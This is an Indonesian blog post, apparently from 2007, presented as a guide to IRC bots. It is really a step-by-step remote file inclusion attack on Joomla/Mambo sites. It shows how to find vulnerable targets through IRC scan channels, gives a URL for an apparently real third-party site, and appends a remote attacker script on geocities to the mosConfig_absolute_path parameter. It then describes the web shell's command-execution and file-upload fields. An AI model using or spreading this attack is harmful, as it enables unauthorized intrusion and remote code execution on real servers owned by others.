tutoku buat kamu

BOT IRC

Posted on: May 22, 2007

Siapa sih yang gak ngenal IRC, Dan pastinya juga sudah tau tentang bot IRC….
Lalu…
Bagaimana sih cara membuatnya…
Okey…
Kita akan pelajari di sini…
Pertama yang harus kita siapkan adalah:
1. Target
2. Atacker
tapi sebelumnya…
bagaimana sih mendapatkan target nya?
sebenarnya mudah saja kok..!!
pertama qm tinggal join aja di salah satu chanel yang ada scan nya..!!
contohnya #nothacker
lalu kamu tinggal tunggu aja sampe target nya muncul!!!

Nih adalah contoh target nya:
http://www.fincacardaba.com/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=

Lalu ini adalah contoh Atacker nya:
http://geocities.com/the_budos/injeksi.txt?

Nah…
Setelah itu, target dan atacker nya di jadikan satu!!
atacker di letakan di belakang target
jadinya seperti ini nih:
http://www.fincacardaba.com/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/the_budos/injeksi.txt?

setelah jadi kayak gitu..!!
sekarang tinggal mulai deh..!!
masukan alamat nya ke browser kamu..!!
lalu akan muncul 3 kolom, di bagian bawah
Kolom 1: kolom perintah/kOeMeN ExeCutE
Kolom 2: Kolom Directory, untuk memasukan directory anda setelah melakukan scan
Kolom 3:adalah kolom untuk melakukan upload file
Nah..!!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: